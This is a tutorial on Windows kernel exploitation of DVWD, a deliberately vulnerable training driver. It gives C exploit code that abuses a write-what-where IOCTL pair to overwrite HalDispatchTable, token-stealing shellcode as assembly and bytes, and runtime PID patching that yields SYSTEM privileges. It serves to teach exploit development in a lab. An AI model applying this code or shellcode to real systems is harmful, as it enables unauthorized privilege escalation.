Introduction to Windows Kernel Exploitation – DVWD.sys

Introduction

In these days of DEP, ASLR, /GS, SafeSEH and SEHOP, (reliable) exploitation of userland applications becomes more difficult with every new release of Windows. Exploitation of Windows drivers, on the other hand, is a fruit that hangs lower every day, and it is becoming a major concern among security professionals. For this reason, and because there are not many documents on the internet about this subject, I decided to throw in my two cents and write this “Introduction to Windows Kernel Exploitation” article.

I have not mastered this topic yet, so I may make some mistakes; if I do, feel free to correct me.

DVWD – Damn Vulnerable Windows Driver

After finishing the sixth chapter of “A guide to kernel exploitation”, I decided to check out the accompanying driver and exploits to see if I could get privesc somehow. After compiling the exploit code with Visual Studio 2008 and running it, I failed to make the exploit work, because it was written for another platform.

So…that’s it. No luck this time. I didn’t get system.

Or if you don’t want to accept the results, and want to know how 1337 h4XX0rZ make their exploits, you can continue reading, and if you are smart enough, you’ll end this article with a fully functional exploit against the DVWD driver.
Okay, let’s see what DVWD does…

As I had access to the source code, I decided to have a look at it before trying to audit the IOCTL handler. Below are the declarations of the entry point, the unload routine and the IRP dispatch routines of the DVWD driver (taken from the source code of the driver).

NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegistryPath);
DRIVER_UNLOAD DvwdUnload;
VOID DvwdUnload(PDRIVER_OBJECT DriverObject);

__drv_dispatchType(IRP_MJ_CREATE) DRIVER_DISPATCH DvwdCreate;
__drv_dispatchType(IRP_MJ_CLOSE) DRIVER_DISPATCH DvwdClose;
__drv_dispatchType(IRP_MJ_DEVICE_CONTROL) DRIVER_DISPATCH DvwdIoControl;

DRIVER_DISPATCH DvwdNoFunction;
NTSTATUS __declspec(dllexport) DvwdHandleIoctlStackOverflow(PIRP Irp, PIO_STACK_LOCATION pIoStackIrp);
NTSTATUS DvwdHandleIoctlOverwrite(PIRP Irp, PIO_STACK_LOCATION pIoStackIrp);
NTSTATUS DvwdHandleIoctlStore(PIRP Irp, PIO_STACK_LOCATION pIoStackIrp);

You can read more about Windows drivers here.

By reading the C code of the driver I found out that it could handle five different IO control codes (from now on IOCTLs):

  • DEVICEIO_DVWD_STACKOVERFLOW – IOCTL code 0x801 – Copies a buffer from userland to a privileged buffer. The length of the buffer is not checked beyond a probe call, and as you’ll see, this is where a vulnerability resides.
  • DEVICEIO_DVWD_STORE – IOCTL code 0x805 – Copies a buffer from userland to the GlobalOverwriteStruct structure in kernelland.
  • DEVICEIO_DVWD_OVERWRITE – IOCTL code 0x802 – Retrieves the contents of the GlobalOverwriteStruct structure and copies it to a buffer on a specified address. The address is not checked, and as you will get to see later, here resides a vulnerability too.
  • DEVICEIO_DVWD_SHELLCODE – IOCTL code 0x803 – This IOCTL won’t be used in the process of exploitation
  • DEVICEIO_DVWD_SHELLCODEUSER – IOCTL code 0x804 – Irrelevant

Examining the utility of the IOCTLs

First of all, let’s see what those IOCTLs do

  • DEVICEIO_DVWD_STORE is handled by the function DvwdHandleIoctlStore(), that calls TriggerStore(). TriggerStore() checks if the pointer to the structure passed through the IOCTL belongs to userland by using ProbeForRead(); if it does belong to userland, TriggerStore calls SetSavedData to copy the contents of the buffer to a kernelland address. Before copying, SetSavedData calls ProbeForRead once again to check that the buffer to be copied resides in userland
  • DEVICEIO_DVWD_OVERWRITE is handled by the function DvwdHandleIoctlOverwrite(), which calls TriggerOverwrite() the same way TriggerStore() was called by DvwdHandleIoctlStore(). TriggerOverwrite() then calls GetSavedData, which copies the contents of the GlobalOverwriteStruct structure to a given address. The destination address is not checked in any way, which allows us to copy the data anywhere, including kernelland.
  • DEVICEIO_DVWD_STACKOVERFLOW is handled by DvwdHandleIoctlStackOverflow(). This function makes a call to TriggerOverflow(), where a vulnerable memcpy operation exists. A stack-based buffer overflow can be triggered using this IOCTL.

With all that, we are able to determine that by (ab)using the IOCTLs DEVICEIO_DVWD_STORE and DEVICEIO_DVWD_OVERWRITE we can copy something from a buffer controlled by us in userland to an arbitrary address (userland or kernelland). This is called a write-what-where vulnerability.
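
To make the interplay of the two IOCTLs concrete, here is a small userland model of it. It is only a sketch: mock_store and mock_overwrite are hypothetical stand-ins for the driver's store and overwrite paths, the saved_data buffer plays the role of GlobalOverwriteStruct, and no real driver or kernel memory is involved.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical model of the request structure passed to both IOCTLs. */
typedef struct {
    void  *StorePtr;  /* STORE: source buffer; OVERWRITE: destination address */
    size_t Size;      /* number of bytes to copy */
} mock_request;

/* Stand-in for GlobalOverwriteStruct: data parked "inside the driver". */
static unsigned char saved_data[16];
static size_t        saved_size;

/* Models DEVICEIO_DVWD_STORE: copy caller-chosen bytes into the driver.
   The real driver probes the source pointer; this model only checks size. */
static int mock_store(const mock_request *req)
{
    if (req->Size > sizeof(saved_data))
        return -1;
    memcpy(saved_data, req->StorePtr, req->Size);
    saved_size = req->Size;
    return 0;
}

/* Models DEVICEIO_DVWD_OVERWRITE: copy the parked bytes to StorePtr.
   The destination is not validated, which is the flaw being illustrated. */
static void mock_overwrite(const mock_request *req)
{
    memcpy(req->StorePtr, saved_data, saved_size);
}

/* "What" is chosen with the first request, "where" with the second. */
static void write_what_where(void *where, void *what, size_t size)
{
    mock_request req = { what, size };
    if (mock_store(&req) == 0) {
        req.StorePtr = where;
        mock_overwrite(&req);
    }
}
```

Calling write_what_where(&target, &value, sizeof(value)) leaves target equal to value, which is the whole primitive: the first request picks the data, the second picks the destination.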

To exploit this kind of vulnerability, as documented by Ruben Santamarta in his paper “Exploiting common flaws in drivers” it is possible to overwrite a pointer from a kernel dispatch table, given that a userland process has complete control of the parameters involved in the vulnerable memcpy call.

Below is a relevant fragment from Ruben Santamarta’s paper.

General Case:

  • Address overwritten is controlled
  • Value/Values we need to overwrite are controlled or the value is not controlled but is lower than MmUserProbeAddress.

Method: HalDispatchTable

HalDispatchTable

HalDispatchTable is an example of a kernel dispatch table. Dispatch tables store pointers and are used as a level of abstraction between two or more layers. The Hardware Abstraction Layer (HAL) dispatch table is stored in the kernel executive (ntoskrnl.exe), or in ntkrnlpa.exe for systems with Physical Address Extension (PAE) support. This particular table holds the addresses of a few HAL routines. You can see the pointers held by HalDispatchTable with the aid of the kernel debugger.
HalDispatchTable as shown in the kernel debugger

NtQueryIntervalProfile

NtQueryIntervalProfile is an undocumented function that retrieves the currently set delay between performance counter ticks. Below is its syntax (taken from undocumented.ntinternals.net):

NtQueryIntervalProfile(
IN KPROFILE_SOURCE      ProfileSource,
OUT PULONG              Interval );

Internally, it calls KeQueryIntervalProfile, which is a function exported by the kernel executive. If we disassemble the function, we can see that a pointer from HalDispatchTable is used in a call, as the following screenshot shows (see 0x8065cea2).
KeQueryIntervalProfile

Therefore, if we place our code in userland, overwrite the second entry of HalDispatchTable (HalDispatchTable+0x4) with a pointer to our (shell)code (userland) and a ring3 process calls NtQueryIntervalProfile, our code will get executed with ring0 privileges.
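
The effect of overwriting a dispatch table entry can be modelled in plain C with an array of function pointers. This is a sketch only: mock_dispatch_table, mock_query_interval_profile and the two handlers are hypothetical names, and nothing here touches the real HalDispatchTable.

```c
#include <stddef.h>

typedef int (*handler_fn)(void);

/* Hypothetical handlers: the routine the table is supposed to reach,
   and the code an attacker wants to run instead. */
static int legitimate_handler(void) { return 1; }
static int attacker_payload(void)   { return 1337; }

/* Slot 0 is left empty here; slot 1 stands in for HalDispatchTable+0x4
   (the second pointer-sized entry on a 32-bit system). */
static handler_fn mock_dispatch_table[2] = { NULL, legitimate_handler };

/* Models the indirect call made on behalf of NtQueryIntervalProfile:
   the caller never names the handler, it trusts whatever the table holds. */
static int mock_query_interval_profile(void)
{
    return mock_dispatch_table[1]();
}
```

After mock_dispatch_table[1] = attacker_payload, the same call to mock_query_interval_profile() reaches the attacker's function without the caller changing at all.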

Exploitation:

To be able to exploit this, a ring3 process will have to:

  1. Retrieve the address of HalDispatchTable and HalDispatchTable+0x4. We can do this by loading the kernel executive in userland, finding the offset to HalDispatchTable, and deducing the address of the *real* HalDispatchTable that sits in kernelland.
  2. Allocate RWX memory in userland and place our shellcode there.
  3. Overwrite the second entry of HalDispatchTable using a combination of the IOCTLs
  4. Call NtQueryIntervalProfile and elevate our privileges

Now, having a process with NT AUTHORITY\SYSTEM privileges, we can do whatever we want, like creating a user, spawning a system shell…
OK. Let’s start building an exploit…

Retrieve the address of HalDispatchTable
Nothing really difficult here. Just a couple of LoadLibrary calls and we’re all set
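
The address arithmetic behind this step can be sketched as follows. The approach assumed here is the common one: map the kernel image into our own process (for example with LoadLibraryEx and the DONT_RESOLVE_DLL_REFERENCES flag), look up the exported HalDispatchTable symbol with GetProcAddress, and rebase the result onto the address where the kernel is really loaded. How the real base is obtained is left out, and the helper names are made up for illustration.

```c
#include <stdint.h>

/* Hypothetical helper: translate the address of a symbol found in a
   userland mapping of an image into its address in the real, loaded image.
     user_base   - where our process mapped the image
     user_symbol - address of the symbol inside that mapping
     kernel_base - where the kernel actually loaded the image */
static uint32_t rebase_symbol(uint32_t user_base, uint32_t user_symbol,
                              uint32_t kernel_base)
{
    uint32_t offset = user_symbol - user_base;  /* offset is load-independent */
    return kernel_base + offset;
}

/* The entry to overwrite is the second pointer in the table (+0x4 on x86). */
static uint32_t second_entry(uint32_t hal_dispatch_table)
{
    return hal_dispatch_table + 0x4;
}
```

With made-up sample values, a mapping at 0x00400000 with the symbol at 0x0046f5c0 and a kernel base of 0x804d7000 gives 0x805465c0 for the table and 0x805465c4 for the entry to overwrite.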

Allocate RWX memory in userland and place our shellcode there.
To allocate new memory, we will be using VirtualAlloc, a function that reserves or commits a page or a region of pages of memory to the virtual memory of the process that called the function. The syntax is the following:

LPVOID WINAPI VirtualAlloc(
  _In_opt_  LPVOID lpAddress,
  _In_      SIZE_T dwSize,
  _In_      DWORD flAllocationType,
  _In_      DWORD flProtect
);

So, we will be calling the function as follows:

LPVOID shellcodemem;
shellcodemem = VirtualAlloc(NULL, 512, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

In essence, this commits a region of at least 512 bytes (the size is rounded up to a whole page) of RWX memory. Passing NULL as lpAddress lets the system choose where to place the region. The memory is automatically initialized to zero, and the call returns an LPVOID pointer to it, or NULL if the allocation fails.

Now we can fill the memory with something recognizable, so we can work comfortably later when copying the shellcode to it. This step is optional.

I chose to fill the newly allocated memory region with NOPs, so I will use a memset() call for this purpose. The syntax of the memset function is the following:

void *memset(
   void *dest,
   int c,
   size_t count
);

And to fill our newly allocated memory with NOPs, I will be calling memset with the following arguments:

memset(shellcodemem, '\x90', 512);

The above call will fill 512 bytes of the memory region to which shellcodemem points with NOPs.

Now, we have to copy our shellcode to the memory that we have just filled with NOPs. We can do that with the following memcpy call:

memcpy(shellcodemem, Shellcode, sizeof(Shellcode));

Where Shellcode is defined as follows:

char Shellcode[] = "\xCC";   // INT3 (breakpoint)

Having that, the memcpy call will copy all the shellcode to the buffer that shellcodemem points to.

Second step done! Moving on

Overwrite the second entry of HalDispatchTable using a combination of IOCTLs

First of all, we will have to create a structure that contains the pointer to the shellcodemem buffer and the size of the pointer. We can use the following syntax for that:

typedef struct _ARBITRARY_OVERWRITE_STRUCT
{
  PVOID StorePtr;
  ULONG Size;
} ARBITRARY_OVERWRITE_STRUCT,*PARBITRARY_OVERWRITE_STRUCT;
ARBITRARY_OVERWRITE_STRUCT overwrite;

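Having our structure created, we can now give values to overwrite.StorePtr and to overwrite.Size. Note that StorePtr holds the address of the shellcodemem variable rather than its value: the driver copies Size bytes from wherever StorePtr points, and the 4 bytes we want it to store are the pointer to the shellcode itself.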

overwrite.Size = 4;
overwrite.StorePtr = (PVOID)&shellcodemem;

And now, with everything in place, we can almost send the first IOCTL to the driver; before that, we have to #define each IOCTL and open a handle to the device. This can be done with the following code:

//Define IOCTLs
#define DEVICEIO_DVWD_OVERWRITE      CTL_CODE(FILE_DEVICE_UNKNOWN, 0x802, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA)
#define DEVICEIO_DVWD_STORE          CTL_CODE(FILE_DEVICE_UNKNOWN, 0x805, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA)
//Open a handle to the DVWD driver
HANDLE hDevice;
hDevice = CreateFile("\\\\.\\DVWD",
                        GENERIC_READ | GENERIC_WRITE, FILE_SHARE_WRITE | FILE_SHARE_READ | FILE_SHARE_DELETE,
                        NULL,
                        OPEN_EXISTING,
                        0,
                        NULL);
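
For reference, this is how the CTL_CODE macro packs its four arguments into a 32-bit control code. The sketch redefines the macro and the constants locally (under MOCK_ names, with the values used by the Windows headers) so that it compiles without the SDK; in a real build they come from the Windows headers. The dvwd_ioctl helper is a hypothetical name.

```c
#include <stdint.h>

/* Local copies of the header values, prefixed MOCK_ to avoid clashing
   with the real definitions when the Windows headers are included. */
#define MOCK_FILE_DEVICE_UNKNOWN 0x00000022u
#define MOCK_METHOD_NEITHER      3u
#define MOCK_FILE_READ_DATA      0x0001u
#define MOCK_FILE_WRITE_DATA     0x0002u

/* Same bit layout as CTL_CODE: device type in bits 16-31, required access
   in bits 14-15, function code in bits 2-13, transfer method in bits 0-1. */
#define MOCK_CTL_CODE(dev, func, method, access) \
    (((uint32_t)(dev) << 16) | ((uint32_t)(access) << 14) | \
     ((uint32_t)(func) << 2) | (uint32_t)(method))

/* Expand a DVWD function code (0x801 ... 0x805) into the full IOCTL value. */
static uint32_t dvwd_ioctl(uint32_t function_code)
{
    return MOCK_CTL_CODE(MOCK_FILE_DEVICE_UNKNOWN, function_code,
                         MOCK_METHOD_NEITHER,
                         MOCK_FILE_READ_DATA | MOCK_FILE_WRITE_DATA);
}
```

With these definitions, dvwd_ioctl(0x805) evaluates to 0x0022E017 and dvwd_ioctl(0x802) to 0x0022E00B, which are the values you would expect to see for the two requests in a debugger or an IRP trace.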

With the handle open, we can send the first IOCTL (DEVICEIO_DVWD_STORE), which reads the buffer described by the struct defined before and copies its contents to GlobalOverwriteStruct in kernelland. The IOCTL can be sent by calling DeviceIoControl() with the following parameters:

DWORD dwReturn;
DeviceIoControl(hDevice, DEVICEIO_DVWD_STORE, &overwrite, 0, NULL, 0, &dwReturn, NULL);

That request makes the driver read the contents of a userland buffer and copy them to another buffer located in kernelland. We now need to get the contents of that kernelland buffer copied to an arbitrary location (HalDispatchTable+0x4). To do that we can send a second IOCTL to the driver, but first we have to change the values in the overwrite struct: instead of pointing to the variable that holds the shellcode address, StorePtr now has to point to the second entry of HalDispatchTable (HalDispatchTable+0x4).

overwrite.Size = 4;                                   // This is not needed
overwrite.StorePtr = (PVOID)HalDispatchTableTarget;

And send the IOCTL…

DeviceIoControl(hDevice, DEVICEIO_DVWD_OVERWRITE, &overwrite, 0, NULL, 0, &dwReturn, NULL);

And if everything was right, you should have seen something like this in your kernel debugger

Debugger view after successful IOCTLs
Now, if you go a bit further, you can inspect the contents of HalDispatchTable and see that it got overwritten.

Overwritten entry in HalDispatchTable

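Now, if NtQueryIntervalProfile gets called, the shellcode (the breakpoint) should get executed/hit and the debugger should say so. NtQueryIntervalProfile is not declared in the SDK headers, so the exploit has to resolve it from ntdll.dll at run time (for example with GetProcAddress) before calling it.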

ULONG w00t=0;
NtQueryIntervalProfile(2, &w00t);

Breakpoint hit

But unless you want to DoS the system you are working on, I suppose that executing a single breakpoint with kernel privileges will not be enough for you. What’s more, if we can get privesc, why settle for a DoS?

Shellcoding

Kernelland is not like userland; in this beautiful place code gets executed with full privileges, meaning that any mistake in the shellcode will get you a BSOD. Trust me, even the “pop calc” shellcode from Metasploit won’t work here, because it was written to run in userland, not in ring0.

When dealing with local kernel exploitation, the obtained code execution is used to do something like patching the access token of a given process with the token of a process with SYSTEM privileges. After that, we can do whatever we want from userland, as we have the token of a SYSTEM process.

Under Windows, access tokens are objects that define the security context of a process. The information held by tokens includes the identity and privileges of the user account associated with the process. Each time a user logs in, an access token is produced, and every process that the user launches holds a copy of the access token. When a process attempts to perform certain operations, the information held by the token is compared to the minimum privileges required to perform the said action. If the process has the privileges required, access is granted, if not, access is denied.

Below is the format of an internal Token object, displayed by issuing the dt nt!_TOKEN command in a kernel debugger.

+0x000 TokenSource          : _TOKEN_SOURCE
+0x010 TokenId              : _LUID
+0x018 AuthenticationId     : _LUID
+0x020 ParentTokenId        : _LUID
+0x028 ExpirationTime       : _LARGE_INTEGER
+0x030 TokenLock            : Ptr32 _ERESOURCE
+0x034 ModifiedId           : _LUID
+0x03c SessionId            : Uint4B
+0x040 UserAndGroupCount    : Uint4B
+0x044 RestrictedSidCount   : Uint4B
+0x048 PrivilegeCount       : Uint4B
+0x04c VariableLength       : Uint4B
+0x050 DynamicCharged       : Uint4B
+0x054 DynamicAvailable     : Uint4B
+0x058 DefaultOwnerIndex    : Uint4B
+0x05c UserAndGroups        : Ptr32 _SID_AND_ATTRIBUTES
+0x060 RestrictedSids       : Ptr32 _SID_AND_ATTRIBUTES
+0x064 PrimaryGroup         : Ptr32 Void
+0x068 Privileges           : Ptr32 _LUID_AND_ATTRIBUTES
+0x06c DynamicPart          : Ptr32 Uint4B
+0x070 DefaultDacl          : Ptr32 _ACL
+0x074 TokenType            : _TOKEN_TYPE
+0x078 ImpersonationLevel   : _SECURITY_IMPERSONATION_LEVEL
+0x07c TokenFlags           : Uchar
+0x07d TokenInUse           : Uchar
+0x080 ProxyData            : Ptr32 _SECURITY_TOKEN_PROXY_DATA
+0x084 AuditData            : Ptr32 _SECURITY_TOKEN_AUDIT_DATA
+0x088 VariablePart         : Uint4B

So, back to the exploit, what are our options if we want to get our privileges elevated all the way up to system?

We can use shellcode that copies the access token of a process with SYSTEM privileges and gives it to our userland process. This is called token stealing shellcode. Below is an example of shellcode that copies one process’s token and gives it to another. Take some time to understand the purpose of each instruction.

; Offsets
WINXP_KTHREAD_OFFSET   equ 124h    ; nt!_KPCR.PcrbData.CurrentThread
WINXP_EPROCESS_OFFSET  equ 044h    ; nt!_KTHREAD.ApcState.Process
WINXP_FLINK_OFFSET     equ 088h    ; nt!_EPROCESS.ActiveProcessLinks.Flink
WINXP_PID_OFFSET       equ 084h    ; nt!_EPROCESS.UniqueProcessId
WINXP_TOKEN_OFFSET     equ 0c8h    ; nt!_EPROCESS.Token
WINXP_SYS_PID          equ 04h     ; PID Process SYSTEM

pushad                                ; save registers

mov eax, fs:[WINXP_KTHREAD_OFFSET]    ; EAX <- current _KTHREAD
mov eax, [eax+WINXP_EPROCESS_OFFSET]  ; EAX <- current _EPROCESS
push eax                              ; keep it for the second search

mov ebx, WINXP_SYS_PID

SearchProcessPidSystem:

mov eax, [eax+WINXP_FLINK_OFFSET]     ; EAX <- _EPROCESS.ActiveProcessLinks.Flink
sub eax, WINXP_FLINK_OFFSET           ; EAX <- _EPROCESS of the next process
cmp [eax+WINXP_PID_OFFSET], ebx       ; UniqueProcessId == SYSTEM PID ?
jne SearchProcessPidSystem            ; if no, retry with the next process...

mov edi, [eax+WINXP_TOKEN_OFFSET]     ; EDI <- Token of the process with SYSTEM PID
and edi, 0fffffff8h                   ; Must be aligned by 8

pop eax                               ; EAX <- current _EPROCESS
mov ebx, 41414141h

SearchProcessPidToEscalate:

mov eax, [eax+WINXP_FLINK_OFFSET]     ; EAX <- _EPROCESS.ActiveProcessLinks.Flink
sub eax, WINXP_FLINK_OFFSET           ; EAX <- _EPROCESS of the next process
cmp [eax+WINXP_PID_OFFSET], ebx       ; UniqueProcessId == PID of the process
                                      ; to escalate ?
jne SearchProcessPidToEscalate        ; if no, retry with the next process...

SwapTokens:

mov [eax+WINXP_TOKEN_OFFSET], edi     ; We replace the token of the process
                                      ; to escalate by the token of the process
                                      ; with SYSTEM PID
PartyIsOver:

popad                                 ; restore registers
ret

Credits for the shellcode go to Jeremy Brun (Xst3nZ), as it was him who used it in his exploit.
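
If the assembly is hard to follow, the same logic can be modelled in C. This is a simplified sketch, not kernel code: mock_process is a hypothetical stand-in for _EPROCESS that keeps only the three fields the shellcode touches, and find_process and steal_token are made-up names.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical, simplified stand-in for _EPROCESS: only the fields the
   shellcode touches, linked in a circular list like ActiveProcessLinks. */
typedef struct mock_process {
    struct mock_process *next;   /* models ActiveProcessLinks.Flink */
    uint32_t             pid;    /* models UniqueProcessId */
    uintptr_t            token;  /* models Token; low 3 bits are masked off */
} mock_process;

/* Walk the circular list starting after `start`; NULL if pid is absent.
   Unlike the shellcode, this model stops after one full lap. */
static mock_process *find_process(mock_process *start, uint32_t pid)
{
    mock_process *p = start->next;
    while (p != start) {
        if (p->pid == pid)
            return p;
        p = p->next;
    }
    return (start->pid == pid) ? start : NULL;
}

/* Copy the token of the process with PID 4 (SYSTEM) to target_pid.
   Returns 0 on success, -1 if either process is missing. */
static int steal_token(mock_process *current, uint32_t target_pid)
{
    mock_process *sys = find_process(current, 4);
    mock_process *dst = find_process(current, target_pid);
    if (sys == NULL || dst == NULL)
        return -1;
    dst->token = sys->token & ~(uintptr_t)7;  /* as in `and edi, 0fffffff8h` */
    return 0;
}
```

One difference is worth noticing: the model gives up after one lap around the list, whereas the jne loops in the shellcode have no such exit, so a PID that never matches keeps them spinning.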

You can now replace the breakpoint we set earlier with the *real* shellcode (taken from Xst3nZ’s exploit).

"\x60\x64\xA1\x24\x01\x00\x00\x8B\x40\x44\x50\xBB\x04\x00\x00\x00"
"\x8B\x80\x88\x00\x00\x00\x2D\x88\x00\x00\x00\x39\x98\x84\x00\x00"
"\x00\x75\xED\x8B\xB8\xC8\x00\x00\x00\x83\xE7\xF8\x58\xBB\x41\x41"
"\x41\x41\x8B\x80\x88\x00\x00\x00\x2D\x88\x00\x00\x00\x39\x98\x84"
"\x00\x00\x00\x75\xED\x89\xB8\xC8\x00\x00\x00\x61\xC3"

Shellcoding – Problems begin

Take a look at these ASM lines belonging to the shellcode:

mov ebx, 41414141h
SearchProcessPidToEscalate:
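mov eax, [eax+WINXP_FLINK_OFFSET]     ; EAX <- _EPROCESS.ActiveProcessLinks.Flink
sub eax, WINXP_FLINK_OFFSET           ; EAX <- _EPROCESS of the next process
cmp [eax+WINXP_PID_OFFSET], ebx       ; UniqueProcessId == PID of the process to escalate ?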

The first instruction places 0x41414141 onto EBX – Nothing strange here. Moving on.

In lines three to five the shellcode tries to retrieve the location of a process with PID AAAA (41414141), then it copies the token of the previously located SYSTEM process (PID 4) and gives it to the process with PID AAAA. Take some time to understand how this is done. Of course, we cannot escalate a process with PID AAAA, simply because it does not exist, and therefore to escalate a specified process, the 41414141h has to be replaced with the PID of the current process or the process we want to escalate (in HEX).

One could try to spawn cmd.exe, open the task manager, look for the PID of cmd.exe, calculate its value in hex, modify the exploit, compile and run it; but it is also possible to modify the shellcode at runtime (after it has been placed in memory) using memcpy calls. For that, the offset from the start of the allocated memory to 41414141 must be known. That can be easily obtained with the help of a userland debugger, by dumping (dd) or disassembling the contents of the memory where the shellcode was placed. The exploit then has to use that offset to locate the PID parameter in the shellcode and replace it.

int PidLoc_int;
int offset = 48;                     // Offset to PID parameter
LPVOID PidLocation_LP;
PidLoc_int = (int)shellcodemem + offset;
PidLocation_LP = (LPVOID)PidLoc_int;

And having a pointer to the four bytes that have to be updated with the PID of the current process, I wrote the following to replace them.

char hexpid[8];
DWORD ProcessID = (DWORD)GetCurrentProcessId();
char i1 = (DWORD)ProcessID & 0x000000FF;
char i2 = ((DWORD)ProcessID & 0x0000FF00) >> 8;
char i3 = ((DWORD)ProcessID & 0x00FF0000) >> 16;
char i4 = ((DWORD)ProcessID & 0xFF000000) >> 24;
hexpid[0] = i1;
hexpid[1] = i2;
hexpid[2] = i3;
hexpid[3] = i4;
memcpy(PidLocation_LP, hexpid, sizeof(hexpid));   

Yes, I know that my code is buggy and that there is a lot of unnecessary conversion, but hey, I’m just a n00b to C++!

So, the purpose of the code above is to retrieve the current PID using GetCurrentProcessId(), split it into four chars (using bitwise AND and shift operations), store the four chars in one array, least significant byte first, and copy that array to the previously calculated PID parameter location in memory (PidLocation_LP).

I verified that the shellcode was being updated correctly by adding a Sleep(xxxx) call after the code above, so I could have a chance to break into the debugger and inspect the shellcode.
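
A less fragile way to do the same patching is to search for the 0x41414141 placeholder instead of hardcoding its offset, and to write exactly four bytes. The following is a sketch under that assumption; find_pid_placeholder and patch_pid are hypothetical helper names, and the code assumes the placeholder occurs only once in the shellcode.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Return the offset of the first 0x41414141 placeholder in code,
   or -1 if it does not occur. */
static long find_pid_placeholder(const unsigned char *code, size_t len)
{
    static const unsigned char marker[4] = { 0x41, 0x41, 0x41, 0x41 };
    size_t i;
    for (i = 0; i + sizeof(marker) <= len; i++) {
        if (memcmp(code + i, marker, sizeof(marker)) == 0)
            return (long)i;
    }
    return -1;
}

/* Overwrite the placeholder with pid, stored little-endian as x86 expects
   for the immediate operand of `mov ebx, imm32`. Exactly 4 bytes are
   written. Returns the patched offset, or -1 if no placeholder was found. */
static long patch_pid(unsigned char *code, size_t len, uint32_t pid)
{
    long off = find_pid_placeholder(code, len);
    if (off < 0)
        return -1;
    code[off + 0] = (unsigned char)(pid & 0xFF);
    code[off + 1] = (unsigned char)((pid >> 8) & 0xFF);
    code[off + 2] = (unsigned char)((pid >> 16) & 0xFF);
    code[off + 3] = (unsigned char)((pid >> 24) & 0xFF);
    return off;
}
```

For the byte string listed above, the search finds the placeholder at offset 46 (the operand of the BB opcode at offset 45), and only four bytes are written, whereas memcpy with sizeof(hexpid) copies all eight bytes of the array. Both differences are worth keeping in mind when reading the next section.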

Shellcoding – Problems continue

I compiled and ran my exploit, the shellcode got called, but NtQueryIntervalProfile never returned and the CPU went crazy.

CPU Running at its maximum capacity

So, what could be wrong?

Well, let’s start with what we know so far:

  • NtQueryIntervalProfile won’t return
  • The CPU is used to its maximum capacity when the shellcode gets called
  • If you kill the exploit process, the CPU keeps working to the max

If you have ever played with egghunters, you may know that for a few seconds, while the egghunter is looking for the “egg(s)” in memory, the CPU runs at its maximum capacity. We have a similar scenario here.

All that points to an endless loop in the shellcode.

In the shellcode, there are two loops that are used to search for specific PIDs. To find out which one of them was causing problems I looked at the disassembly of the shellcode while it was placed in memory. I also set breakpoints at the end of each one of the loops to find out the cause of the problem.

By looking at the disassembly I found out that the shellcode had been corrupted, and some of the instructions had been changed.

The following image shows the code that my program had placed in memory.

Corrupted shellcode placed in memory

I realized that the value expected to be in EAX was being popped from the stack at 0x003a002e and was then being corrupted by the instructions at 0x003a0032, 0x003a0036 and 0x003a0038. However, EAX was not used until 0x003a003a, so I could delay the POP EAX until after the two added instructions had executed; that way EAX still gets corrupted, but it gets fixed before it is used, so the behavior of the exploit is not affected.

I also added some NOPs to have space to comfortably deal with the problem

Shellcode with NOPs

To get EAX fixed before it was used, I moved the POP EAX instruction from 0x003a002c to 0x003a0039 and placed a NOP where the POP EAX was. I adjusted the offsets and executed my exploit.

And…NtQueryIntervalProfile returned!!

This is very good. The shellcode was being executed correctly and therefore giving the exploit process SYSTEM privileges. No BSoD, no crash, nothing bad. At this point I only had to add a single statement in my exploit to get privilege escalation

system("calc.exe");

And… calc.exe got launched, with NT AUTHORITY\SYSTEM privileges. w00t!


calc.exe running as SYSTEM

 Hope you enjoyed this article, and if you want my exploit, just drop me a message, but hey, no cheating!